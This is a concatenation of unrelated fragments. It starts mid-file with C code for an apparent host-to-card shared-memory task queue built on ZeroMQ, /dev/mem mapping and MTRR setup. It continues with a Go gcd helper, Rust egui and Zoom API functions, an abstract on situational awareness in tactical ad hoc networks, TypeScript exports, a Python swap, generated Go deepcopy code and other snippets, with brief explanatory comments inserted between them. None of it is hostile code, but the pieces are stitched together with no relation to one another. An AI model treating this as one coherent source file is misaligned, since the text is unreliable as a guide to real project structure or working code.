	(void)system(command);
}

void initialize_system(const char * ip, const char * port, int * socket)
{
	int rc = 0;
	char ipname[256];

	// is the system already initialized?
	if (!c && !context) {
		// form the ip name and port as a string
		if (ip && port) {
			snprintf(ipname, 256, "tcp://%s:%s", ip, port);
		} else {
			// no ip or port specified, use defaults from the table
			if (*socket > -1 && *socket < 6)
				ip = host_vca_ip_array[get_local_platform_type()][*socket];
			else
				ip = host_vca_ip_array[get_local_platform_type()][get_card_self_socket_number()];
			snprintf(ipname, 256, "tcp://%s:%s", ip, (port) ? port : VCA_HOST_PORT);
		}
		// create zmq context
		context = zmq_ctx_new();
		if (*socket == -1 || *socket == -3) {
			// running as client -> connect to host server
			c = zmq_socket(context, ZMQ_REQ);
			rc = zmq_connect(c, ipname);
			if (rc != 0) {
				perror("Failed to connect to server");
				exit(1);
			}
		} else {
			// running as host -> bind on port clients connect to
			c = zmq_socket(context, ZMQ_REP);
			rc = zmq_bind(c, ipname);
			if (rc != 0) {
				perror("Failed to bind port on host");
				exit(1);
			}
		}
	}
	// exchange socket numbers when needed
	if (*socket == -3) {
		uint32_t s = get_card_self_socket_number();
		rc = zmq_send(c, &s, sizeof(s), 0);
		if (rc != sizeof(s)) {
			perror("Failed to exchange socket numbers");
			exit(1);
		}
		rc = zmq_recv(c, &s, sizeof(s), 0);
		if (rc != sizeof(s) || s != get_card_self_socket_number()) {
			perror("Failed to get ack from host for sock num");
			exit(1);
		}
	} else if (*socket == -2) {
		// accept arbitrary socket number -> fix it for this run
		uint32_t s = 0;
		rc = zmq_recv(c, &s, sizeof(s), 0);
		if (rc != sizeof(s)) {
			perror("Failed to exchange socket numbers");
			exit(1);
		}
		*socket = s;
		rc = zmq_send(c, &s, sizeof(s), 0);
		if (rc != sizeof(s)) {
			perror("Failed to send ack to node for sock num");
			exit(1);
		}
	}
}

int request_sharing(transfer_mapping * map, int (*send_recv)(void *, void *, size_t, int))
{
	int rc = 0;

	rc = send_recv(c, map, sizeof(transfer_mapping), 0);
	if (rc != sizeof(transfer_mapping)) {
		perror("Failed to share memory");
		return rc;
	}
	return 0;
}

int send_recv_mapping(transfer_mapping * in, transfer_mapping * out, int socket)
{
	int rc = 0;
	transfer_mapping error_map = { .socket = -255 };

	if (get_local_platform_type() == HOST) {
		rc = request_sharing(out, ZMQ_RECV);
		// ensure we talk to the correct socket
		if (out->socket != socket) {
			request_sharing(&error_map, ZMQ_SEND);
			return 1; // retry, wrong socket connected
		}
		rc |= request_sharing(in, ZMQ_SEND);
	} else { // for enclaves (clients)
		rc = request_sharing(in, ZMQ_SEND); // first send then recv
		rc |= request_sharing(out, ZMQ_RECV);
		if (out->socket == -255) {
			printf("Host declined sharing memory\n");
			exit(1);
		}
	}
	return rc;
}

int share_local_memory(int socket, void *ptr, unsigned long size, int mapping_type)
{
	unsigned long physical_base = (unsigned long)virt_to_phys_user((unsigned long)ptr);
	transfer_mapping tq, out;
	int rc = 0;

	if (c == NULL) {
		printf("No connection, initialize system first\n");
		exit(1);
	}
	assert(physical_base != 0);
	if (socket == -1)
		socket = get_card_self_socket_number();
	assert(host_vca_ip_array[!get_local_platform_type()][socket] != NULL);
	assert(ptr != NULL);
	assert(size % PAGE_SIZE == 0);
	assert((mapping_type == READ) || (mapping_type == WRITE));

	tq.physical_addr = physical_base;
	tq.size = size;
	tq.mapping_type = mapping_type;
	tq.socket = socket;
	do {
		rc = send_recv_mapping(&tq, &out, socket);
	} while (rc);
	printf("Channel Established..channel phys addr 0x%lx size 0x%lx type %d socket %d\n", physical_base, size, mapping_type, socket);
	return 0;
}

int recv_remote_data(int * socket, unsigned long *remote_physical, unsigned long *size, int *mapping_type)
{
	transfer_mapping in, map;
	int rc = 0;

	if (c == NULL) {
		printf("No connection, initialize system first\n");
		exit(1);
	}
	if (*socket == -1)
		*socket = get_card_self_socket_number();
	do {
		rc = send_recv_mapping(&in, &map, *socket);
	} while (rc);
	*remote_physical = map.physical_addr;
	*size = map.size;
	*mapping_type = map.mapping_type;
	*socket = map.socket;
	printf("Received \"0x%lx 0x%lx %d\" on socket %d\n", *remote_physical, *size, *mapping_type, *socket);
	return 0;
}

unsigned long get_local_mapping(int socket, int mapping_number)
{
	char command[MAX_COMMAND_LEN] = {0,};
	char result[BUFSIZ] = {0,};
	unsigned long remote_base, size, local_base;
	FILE *fp;

	if (get_local_platform_type() != HOST)
		socket = 0;
	snprintf(command, MAX_COMMAND_LEN, "cat /sys/kernel/sgx5_mapper_%d/map%d", socket, mapping_number);
	printf("local mapping %s\n", command);
	if ((fp = popen(command, "r")) == NULL) {
		printf("Error opening pipe!\n");
		return -1;
	}
	assert(fgets(result, BUFSIZ, fp));
	pclose(fp);
	sscanf(result, "0x%lx 0x%lx 0x%lx\n", &remote_base, &size, &local_base);
	assert((remote_base % PAGE_SIZE) == 0);
	assert((size % PAGE_SIZE) == 0);
	assert((local_base % PAGE_SIZE) == 0);
	return local_base;
}

int setup_mtrr_mappings(unsigned long base, unsigned long size, int remote_access_type)
{
	unsigned long i = PAGE_SIZE;
	char caching_type[BUFSIZ] = {0,};

	assert((base % PAGE_SIZE) == 0);
	assert((size % PAGE_SIZE) == 0);
	assert((remote_access_type == READ) || (remote_access_type == WRITE));
	while (i < size)
		i = i << 1;
	size = i;
	base = base & ((~size) + 1); //Find the MTRR base that is a multiple of size
	if (remote_access_type == READ)
		strncpy(caching_type, "write-through", BUFSIZ); //OR WRITE-BACK based on access requirement
	if (remote_access_type == WRITE)
		strncpy(caching_type, "write-combining", BUFSIZ);
	printf("Calculated base=0x%lx size=0x%lx type=%s mapping for MTRR\n", base, size, caching_type);
	execute("echo \"base=0x%lx size=0x%lx type=%s\" > /proc/mtrr", base, size, caching_type);
	return 0;
}

unsigned long setup_local_mappings(int socket, int mapping_number, unsigned long base, unsigned long size)
{
	assert((base % PAGE_SIZE) == 0);
	assert((size % PAGE_SIZE) == 0);
	if (socket == -1)
		socket = get_card_self_socket_number();
	if (get_local_platform_type() != HOST)
		socket = 0;
	printf("sgx5_mapper_%d/map%d init\n", socket, mapping_number);
	execute("echo \"0x00 0x00\" > /sys/kernel/sgx5_mapper_%d/map%d", socket, mapping_number);
	execute("echo \"0x%lx 0x%lx\" > /sys/kernel/sgx5_mapper_%d/map%d", base, size, socket, mapping_number);
	base = get_local_mapping(socket, mapping_number);
	return base;
}

void* map_phys_memory(unsigned long phys, unsigned long size)
{
	int fd;
	void* ptr;

	if ((fd = open("/dev/mem", O_RDWR)) == -1) {
		perror("open");
		exit(1);
	}
	ptr = mmap(0, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, phys);
	assert(ptr != MAP_FAILED);
	close(fd);
	return ptr;
}

void* map_remote_memory(transfer_mapping * map, int socket, unsigned long request_size, int mapping_number)
{
	unsigned long local_physical, local_size, page_offset;

	if (get_local_platform_type() != HOST) //Workaround for bug in detecting CARD
		socket = -1;
	assert(map->size % PAGE_SIZE == 0);
	assert(map->size == request_size);
	assert(mapping_number < MAX_MAPPINGS_PER_VCA_SOCKET);
	assert((map->mapping_type == READ) || (map->mapping_type == WRITE));
	page_offset = map->physical_addr & 0xFFF;
	if (page_offset != 0) {
		map->physical_addr = map->physical_addr - page_offset;
		local_size = map->size + PAGE_SIZE;
	} else {
		local_size = map->size;
	}
	local_physical = setup_local_mappings(socket, mapping_number, map->physical_addr, local_size);
	// printf("Channel Established... channel phys addr 0x%lx size 0x%lx type %d socket %d\n",local_physical + page_offset, local_size, mapping_type, get_card_self_socket_number());
	return (void *)((unsigned long)map_phys_memory(local_physical, local_size) + page_offset);
}

int allocate_ring(void ** addr_ptr, void * (*alloc) (), int size, transfer_mapping * map, int socket, int rem_prod)
{
	int i = 0;

	*addr_ptr = alloc();
	for (i = 0; i < MAX_CHANNELS_PER_VCA_SOCKET; i++) {
		((unsigned long *)*addr_ptr)[rem_prod + 2*i] = (i * MAX_ITEMS);
		((unsigned long *)*addr_ptr)[rem_prod + (2*i) + 1] = i * MAX_ITEMS;
	}
	map->physical_addr = (unsigned long)virt_to_phys_user((unsigned long) *addr_ptr);
	map->size = size;
	map->mapping_type = REMOTE_WILL_WRITE;
	map->socket = socket;
	assert(map->physical_addr != 0);
	assert(map->size % PAGE_SIZE == 0);
	assert(map->mapping_type == READ || map->mapping_type == WRITE);
	return 0;
}

queue_object *init_dequeue(int socket)
{
	int rc = 0;
	transfer_mapping in, out;

	if (c == NULL) {
		printf("No connection, initialize system first\n");
		exit(1);
	}
	if (get_local_platform_type() == HOST) {
		printf("Local Platform is HOST\n");
		assert(socket < VCA_SOCKETS);
	} else {
		printf("Local Platform is CARD\n");
		socket = get_card_self_socket_number();
	}
	assert(socket >= 0 && host_vca_ip_array[!get_local_platform_type()][socket] != NULL);
	queue_object *q = malloc(sizeof(queue_object));
	assert(q != NULL);
	if (allocate_ring(&q->ring_2mb, get_contiguous__2MB, _2MB, &in, socket, REMOTE_PRODUCER)) {
		free(q);
		return NULL;
	}
	do {
		rc = send_recv_mapping(&in, &out, socket);
	} while (rc);
	q->ring_4kb = map_remote_memory(&out, socket, PAGE_SIZE, DEQUEUE_MAP_NUMBER);
	q->queue_type = DEQUEUE_MAP_NUMBER;
	q->socket = socket;
	return q;
}

queue_object * init_enqueue(int socket)
{
	int rc = 0;
	transfer_mapping in, out;

	if (c == NULL) {
		printf("No connection, initialize system first\n");
		exit(1);
	}
	if (get_local_platform_type() == HOST) {
		printf("Local Platform is HOST\n");
		assert(socket < VCA_SOCKETS);
	} else {
		printf("Local Platform is CARD\n");
		socket = get_card_self_socket_number();
	}
	queue_object *q = malloc(sizeof(queue_object));
	assert(q != NULL);
	if (allocate_ring(&q->ring_4kb, get_contiguous__4KB, PAGE_SIZE, &in, socket, 0)) {
		free(q);
		return NULL;
	}
	do {
		rc = send_recv_mapping(&in, &out, socket);
	} while (rc);
	q->ring_2mb = map_remote_memory(&out, socket, _2MB, ENQUEUE_MAP_NUMBER);
	q->queue_type = ENQUEUE_MAP_NUMBER;
	q->socket = socket;
	printf("Init split enqueue done : _2MB pointer %p 4KB pointer %p \n", q->ring_2mb, q->ring_4kb);
	return q;
}

void free_queue(queue_object *q)
{
	assert(q != NULL);
	if (q->queue_type == DEQUEUE_MAP_NUMBER) {
		assert(q->ring_2mb != NULL);
		free(q->ring_2mb);
	} else if (q->queue_type == ENQUEUE_MAP_NUMBER) {
		assert(q->ring_4kb != NULL);
		free(q->ring_4kb);
	}
	free(q);
}

void *init_host_task_system(void *opq, const char * ip, const char * port, int * socket)
{
	task_queue_opaque *opaque = opq;
	unsigned int i = 0;

	assert(*socket < VCA_SOCKETS);
	if (opaque == NULL) {
		opaque = (task_queue_opaque *) malloc(sizeof(task_queue_opaque));
		assert(opaque != NULL);
		memset(opaque, 0, sizeof(task_queue_opaque));
		opaque->next_recv_channel = 0;
		opaque->next_submit_channel = 0;
		opaque->next_recv_socket = 0;
		opaque->next_submit_socket = 0;
		opaque->total_sockets = 0;
		for (i = 0; i < VCA_SOCKETS; i++)
			opaque->active_sockets[i] = -1;
	}
	initialize_system(ip, port, socket); // may update the socket, depending on who connects
	opaque->active_sockets[opaque->total_sockets++] = *socket;
	printf("\nInitializing communication with worker on socket %d\n", *socket);
	opaque->tx_q_objs[*socket] = init_enqueue(*socket);
	assert(opaque->tx_q_objs[*socket] != NULL);
	opaque->rx_q_objs[*socket] = init_dequeue(*socket);
	assert(opaque->rx_q_objs[*socket] != NULL);
	return opaque;
}

void *init_vca_task_system(const char * ip, const char * port, int * socket)
{
	task_queue_opaque *opaque;

	opaque = (task_queue_opaque *) malloc(sizeof(task_queue_opaque));
	assert(opaque != NULL);
	memset(opaque, 0, sizeof(task_queue_opaque));
	initialize_system(ip, port, socket);
	opaque->rx_q_objs[0] = init_dequeue(-1);
	assert(opaque->rx_q_objs[0] != NULL);
	opaque->tx_q_objs[0] = init_enqueue(-1);
	assert(opaque->tx_q_objs[0] != NULL);
	return opaque;
}

void deinit_vca_task_system(void *opq)
{
	int i = 0;
	task_queue_opaque *opaque = opq;

	assert(opaque != NULL);
	printf("\nTearing down communication with workers\n");
	for (i = 0; i < VCA_SOCKETS; i++) {
		if (opaque->rx_q_objs[i])
			free_queue(opaque->rx_q_objs[i]);
		if (opaque->tx_q_objs[i])
			free_queue(opaque->tx_q_objs[i]);
	}
	free(opaque);
	zmq_close(c);
	zmq_ctx_destroy(context);
}
#endif //NOT ENCLAVE MODE

int s_variable_multi_enqueue(queue_object *queue_obj, void *source, unsigned int total_elements, unsigned int idx)
{
	unsigned long *ring = queue_obj->ring_2mb;
	unsigned long *prod_cons_array = queue_obj->ring_4kb;
	unsigned int real_idx = idx << 1;
	unsigned int LP_VAL = (unsigned int) prod_cons_array[real_idx + LOCAL_PRODUCER];
	unsigned int RC_VAL = prod_cons_array[real_idx + REMOTE_CONSUMER];
	unsigned int LOWER_BOUND = idx << MAX_ITEMS_ORDER;
	unsigned int UPPER_BOUND = LOWER_BOUND + MAX_ITEMS;
	unsigned int max_dist, num_elements, remaining_elements;

	max_dist = (RC_VAL - (LP_VAL + 1)) % MAX_ITEMS;
	num_elements = MIN(UPPER_BOUND - LP_VAL, total_elements);
	remaining_elements = total_elements - num_elements;
	if (likely(total_elements <= max_dist)) {
		memcpy((void *)(ring + LP_VAL), (void *)source, num_elements << 3);
		asm volatile ("mfence" ::: "memory");
		if (unlikely(remaining_elements != 0)) {
			memcpy((void *)(ring + LOWER_BOUND), (void *)((unsigned long)source + (num_elements << 3)), remaining_elements << 3);
			asm volatile ("mfence" ::: "memory");
			ring[real_idx + REMOTE_PRODUCER] = prod_cons_array[real_idx + LOCAL_PRODUCER] = LOWER_BOUND + remaining_elements;
		} else {
			ring[real_idx + REMOTE_PRODUCER] = prod_cons_array[real_idx + LOCAL_PRODUCER] = LP_VAL + num_elements;
		}
		return total_elements;
	}
	return 0;
}

int s_variable_multi_dequeue(queue_object *queue_obj, void *source, unsigned int max_requested, unsigned int idx)
{
	unsigned long *ring = queue_obj->ring_2mb;
	unsigned long *prod_cons_array = queue_obj->ring_4kb;
	unsigned int real_idx = idx << 1; //2x the idx value
	unsigned int LC_VAL = (unsigned int)ring[real_idx + LOCAL_CONSUMER];
	unsigned int RP_VAL = ring[real_idx + REMOTE_PRODUCER];
	unsigned int LOWER_BOUND = idx << MAX_ITEMS_ORDER;
	unsigned int UPPER_BOUND = LOWER_BOUND + MAX_ITEMS;
	unsigned int max_available, num_elements, remaining_elements;

#ifdef HOST_MODE
	asm volatile ("mfence" ::: "memory");
#endif
	max_available = (RP_VAL - LC_VAL) % MAX_ITEMS;
	if (likely(max_requested <= max_available)) {
		num_elements = MIN(UPPER_BOUND - LC_VAL, max_requested);
		remaining_elements = max_requested - num_elements;
		memcpy((void *) source, (void *)(ring + LC_VAL), num_elements << 3);
		if (unlikely(remaining_elements != 0)) {
			memcpy((void *)((unsigned long)source + (num_elements << 3)), (void *)(ring + LOWER_BOUND), remaining_elements << 3);
			prod_cons_array[real_idx + REMOTE_CONSUMER] = ring[real_idx + LOCAL_CONSUMER] = LOWER_BOUND + remaining_elements;
		} else {
			prod_cons_array[real_idx + REMOTE_CONSUMER] = ring[real_idx + LOCAL_CONSUMER] = LC_VAL + num_elements;
		}
		return max_requested;
	}
	return 0;
}

long common_submit_task(void *opq, long task_length, void *task_buffer, int channel, int socket)
{
	task_queue_opaque *opaque = opq;
	long ret;
	int burst_num;
	task_header th;

	// printf("submit task len %d, channel %d socket %d\n", task_length, channel, socket);
	th.total_bursts = ((task_length - 1) / BUFF_SIZE_BOUNDARY) + 1;
	th.payload_size = task_length;
	th.magic = MAGIC;
	do {
		ret = s_variable_multi_enqueue(opaque->tx_q_objs[socket], &th, NUM_ITEMS, channel);
	} while (ret != NUM_ITEMS); //&& (++retries <= MAX_RETRY));
	// Start enqueuing
	for (burst_num = 0; burst_num < th.total_bursts; burst_num++) {
		do {
			ret = s_variable_multi_enqueue(opaque->tx_q_objs[socket], task_buffer + (burst_num * BUFF_SIZE_BOUNDARY), NUM_ITEMS, channel);
		} while (ret != NUM_ITEMS); //&& (++retries <= MAX_RETRY));
	}
	return task_length;
}

long common_recv_task(void *opq, long *task_length, void *task_buffer, int channel, int socket)
{
	task_queue_opaque *opaque = opq;
	int burst_num = 0; //Later use round robin to find from which channel data needs to be acquired
	long ret;
	task_header th;

	assert(opaque && task_buffer);
	ret = s_variable_multi_dequeue(opaque->rx_q_objs[socket], &th, NUM_ITEMS, channel);
	if (ret != NUM_ITEMS)
		return -1;
	assert((th.total_bursts != 0) && (th.payload_size != 0) && (th.magic == MAGIC));
	*task_length = th.payload_size;
	// Start dequeuing
	for (burst_num = 0; burst_num < th.total_bursts; burst_num++) {
		do {
			ret = s_variable_multi_dequeue(opaque->rx_q_objs[socket], task_buffer + (burst_num * BUFF_SIZE_BOUNDARY), NUM_ITEMS, channel);
		} while (ret != NUM_ITEMS);
	}
	return 0;
}

long host_submit_task(void *opq, long task_length, void *task_buffer, int task_id)
{
	task_queue_opaque *opaque = opq;
	int channel;
	int socket;

	assert(opaque && task_buffer && task_length);
	channel = task_id < 0 ? (opaque->next_submit_channel++) % MAX_CHANNELS : task_id % 10;
	if (channel == 0)
		opaque->next_submit_socket++;
	socket = task_id < 0 ? opaque->active_sockets[opaque->next_submit_socket % opaque->total_sockets] : task_id / 10;
	assert((channel < MAX_CHANNELS) && (socket < VCA_SOCKETS));
	return common_submit_task(opq, task_length, task_buffer, channel, socket);
}

long host_recv_task(void *opq, long *task_length, void *task_buffer, int *task_id)
{
	task_queue_opaque *opaque = opq;
	int channel, socket;
	int got_data;

	assert(opaque && task_buffer && task_length && task_id);
	do {
		channel = (opaque->next_recv_channel++) % MAX_CHANNELS;
		if (channel == 0)
			opaque->next_recv_socket++;
		socket = opaque->active_sockets[opaque->next_recv_socket % opaque->total_sockets];
		assert((channel < MAX_CHANNELS) && (socket < VCA_SOCKETS));
		*task_id = (socket * 10) + (channel);
		got_data = common_recv_task(opq, task_length, task_buffer, channel, socket);
	} while (got_data != 0);
	return got_data;
}

long vca_submit_task(void *opq, long task_length, void *task_buffer, int channel)
{
	task_queue_opaque *opaque = opq;

	assert(opaque && task_buffer && task_length && (channel < MAX_CHANNELS));
	return common_submit_task(opq, task_length, task_buffer, channel, 0);
}

long vca_recv_task(void *opq, long *task_length, void *task_buffer, int channel)
{
	task_queue_opaque *opaque = opq;
	int got_data = 0;

	assert(opaque && task_buffer && task_length && (channel < MAX_CHANNELS));
	do {
		got_data = common_recv_task(opq, task_length, task_buffer, channel, 0);
	} while (got_data != 0);
	return got_data;
}
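To make the calling sequence of this file's API concrete, here is a minimal host-side driver sketch. It assumes linkage against this file and vca_mem.h; the buffer sizes, the "ping" payload, and the use of socket = -2 (accept whichever card connects first) are illustrative choices, not taken from the original sources.

/* Hypothetical host-side driver for the task-queue API above. */
#include <stdio.h>
#include <string.h>

int main(void)
{
	int socket = -2;               /* host: accept whichever card connects */
	void *opq = NULL;
	char out_buf[4096] = "ping";
	char in_buf[4096];
	long in_len = 0;
	int task_id = -1;

	/* Binds the ZMQ endpoint, exchanges socket numbers and sets up both rings. */
	opq = init_host_task_system(opq, NULL, NULL, &socket);

	/* Round-robin submit (task_id < 0) followed by a blocking receive. */
	host_submit_task(opq, (long)strlen(out_buf) + 1, out_buf, -1);
	host_recv_task(opq, &in_len, in_buf, &task_id);
	printf("got %ld bytes back from task %d\n", in_len, task_id);

	deinit_vca_task_system(opq);
	return 0;
}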
// findGcd returns the greatest common divisor of any number of numbers.
func findGcd(values ...int32) int32 {
	switch len(values) {
	case 0:
		return 0
	case 1:
		return values[0]
	}
	res := values[0]
	for i := 1; i < len(values); i++ {
		res = gcd(res, values[i])
	}
	return res
}
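findGcd delegates to a two-argument gcd that is not defined in this snippet and presumably lives elsewhere in the package; a standard Euclidean implementation matching the int32 signature would look like this sketch:

// gcd returns the greatest common divisor of two numbers using Euclid's algorithm.
func gcd(a, b int32) int32 {
	for b != 0 {
		a, b = b, a%b
	}
	return a
}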
/// Creates a new egui window. pub fn create_egui_window( &self, label: String, app: Box<dyn epi::App + Send>, native_options: epi::NativeOptions, ) -> Result<()> { let proxy = self.context.proxy.clone(); send_user_message( &self.context, Message::CreateGLWindow(label, app, native_options, proxy), )?; Ok(()) }
Evaluating the effectiveness of Situational Awareness dissemination in tactical mobile ad hoc networks Situational Awareness (SA) dissemination in tactical mobile ad hoc networks (MANETs) plays an essential role in command and control systems for military operations. This task is particularly difficult in highly dynamic and complex environments with strict resource constraints on mobile units. In this work we present a design of SA dissemination schemes based on the multipoint relay (MPR) technique. We implement the schemes on a simulation platform and investigate their effectiveness in a real-time manner using novel metrics focusing on the completeness and freshness of SA, as well as the network traffic overhead and local processing cost. Two mobile scenarios, including one that is based on the Reference Point Group Mobility model, are set up to simulate the real-world behavior of tactical MANETs. The MPR-based methods are compared against an alternative scheme, Opportunistic Situational Awareness Passing, where the simulations highlight tradeoffs and provide insight into selection of design parameters.
export {default as Day, Props as DayProps} from './Day'; export {default as Month, Props as MonthProps} from './Month'; export {default as Weekday, Props as WeekdayProps} from './Weekday';
/** * Delete user assistants. * * This function performs a `DELETE` to the `/users/{userId}/assistants` endpoint. * * Delete all assistants of the current user. For user-level apps, pass [the `me` value](https://marketplace.zoom.us/docs/api-reference/using-zoom-apis#mekeyword) instead of the `userId` parameter. * * Assistants are the users to whom the current user has assigned [scheduling privilege](https://support.zoom.us/hc/en-us/articles/201362803-Scheduling-Privilege). These assistants can schedule meeting on behalf of the current user as well as manage and act as an alternative host for all meetings if the admin has enabled [Co-host option](https://zoom.us/account/setting) on the account. * * **Scopes:** `user:write:admin`, `user:write`<br>**[Rate Limit Label](https://marketplace.zoom.us/docs/api-reference/rate-limits#rate-limits):** `Light` * * **Prerequisites:** * * The user as well as the assistant must have Licensed or an On-prem license. * * Assistants must be under the current user's account. * * **Parameters:** * * * `user_id: &str` -- The user ID or email address of the user. For user-level apps, pass `me` as the value for userId. */ pub async fn assistants_delete(&self, user_id: &str) -> Result<()> { let url = format!( "/users/{}/assistants", crate::progenitor_support::encode_path(&user_id.to_string()), ); self.client.delete(&url, None).await }
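For orientation, a hedged call-site sketch follows. The zoom_api::Client type, the users() accessor, and the anyhow error wrapper are assumptions inferred from the generated-client style of this code, not confirmed by the excerpt:

// Hypothetical call site: delete all assistants of the calling user.
// `client.users()` is assumed to return the struct that owns assistants_delete.
async fn remove_my_assistants(client: &zoom_api::Client) -> anyhow::Result<()> {
    // "me" targets the calling user in user-level apps.
    client.users().assistants_delete("me").await?;
    Ok(())
}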
a = 1 b = 2 a = a + b b = a - b a = a - b print(a) print(b)
// +build !ignore_autogenerated // Copyright 2021 Red Hat, Inc. and/or its affiliates // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. // Code generated by controller-gen. DO NOT EDIT. package v1 import ( runtime "k8s.io/apimachinery/pkg/runtime" ) // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *KogitoBuild) DeepCopyInto(out *KogitoBuild) { *out = *in out.TypeMeta = in.TypeMeta in.ObjectMeta.DeepCopyInto(&out.ObjectMeta) in.Spec.DeepCopyInto(&out.Spec) in.Status.DeepCopyInto(&out.Status) } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new KogitoBuild. func (in *KogitoBuild) DeepCopy() *KogitoBuild { if in == nil { return nil } out := new(KogitoBuild) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *KogitoBuild) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *KogitoBuildList) DeepCopyInto(out *KogitoBuildList) { *out = *in out.TypeMeta = in.TypeMeta in.ListMeta.DeepCopyInto(&out.ListMeta) if in.Items != nil { in, out := &in.Items, &out.Items *out = make([]KogitoBuild, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new KogitoBuildList. func (in *KogitoBuildList) DeepCopy() *KogitoBuildList { if in == nil { return nil } out := new(KogitoBuildList) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *KogitoBuildList) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *KogitoInfra) DeepCopyInto(out *KogitoInfra) { *out = *in out.TypeMeta = in.TypeMeta in.ObjectMeta.DeepCopyInto(&out.ObjectMeta) in.Spec.DeepCopyInto(&out.Spec) in.Status.DeepCopyInto(&out.Status) } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new KogitoInfra. func (in *KogitoInfra) DeepCopy() *KogitoInfra { if in == nil { return nil } out := new(KogitoInfra) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *KogitoInfra) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. 
func (in *KogitoInfraList) DeepCopyInto(out *KogitoInfraList) { *out = *in out.TypeMeta = in.TypeMeta in.ListMeta.DeepCopyInto(&out.ListMeta) if in.Items != nil { in, out := &in.Items, &out.Items *out = make([]KogitoInfra, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new KogitoInfraList. func (in *KogitoInfraList) DeepCopy() *KogitoInfraList { if in == nil { return nil } out := new(KogitoInfraList) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *KogitoInfraList) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *KogitoRuntime) DeepCopyInto(out *KogitoRuntime) { *out = *in out.TypeMeta = in.TypeMeta in.ObjectMeta.DeepCopyInto(&out.ObjectMeta) in.Spec.DeepCopyInto(&out.Spec) in.Status.DeepCopyInto(&out.Status) } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new KogitoRuntime. func (in *KogitoRuntime) DeepCopy() *KogitoRuntime { if in == nil { return nil } out := new(KogitoRuntime) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *KogitoRuntime) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *KogitoRuntimeList) DeepCopyInto(out *KogitoRuntimeList) { *out = *in out.TypeMeta = in.TypeMeta in.ListMeta.DeepCopyInto(&out.ListMeta) if in.Items != nil { in, out := &in.Items, &out.Items *out = make([]KogitoRuntime, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new KogitoRuntimeList. func (in *KogitoRuntimeList) DeepCopy() *KogitoRuntimeList { if in == nil { return nil } out := new(KogitoRuntimeList) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *KogitoRuntimeList) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *KogitoSupportingService) DeepCopyInto(out *KogitoSupportingService) { *out = *in out.TypeMeta = in.TypeMeta in.ObjectMeta.DeepCopyInto(&out.ObjectMeta) in.Spec.DeepCopyInto(&out.Spec) in.Status.DeepCopyInto(&out.Status) } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new KogitoSupportingService. func (in *KogitoSupportingService) DeepCopy() *KogitoSupportingService { if in == nil { return nil } out := new(KogitoSupportingService) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *KogitoSupportingService) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. 
func (in *KogitoSupportingServiceList) DeepCopyInto(out *KogitoSupportingServiceList) { *out = *in out.TypeMeta = in.TypeMeta in.ListMeta.DeepCopyInto(&out.ListMeta) if in.Items != nil { in, out := &in.Items, &out.Items *out = make([]KogitoSupportingService, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new KogitoSupportingServiceList. func (in *KogitoSupportingServiceList) DeepCopy() *KogitoSupportingServiceList { if in == nil { return nil } out := new(KogitoSupportingServiceList) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *KogitoSupportingServiceList) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil }
// RowCount returns the row count of model.Status entries.
func (s *StatusRepository) RowCount() (int, error) {
	var count int64
	// Propagate the query error instead of silently discarding it.
	err := s.db.Model(&model.Status{}).Count(&count).Error
	return int(count), err
}
import MomentUtils from '@date-io/moment'
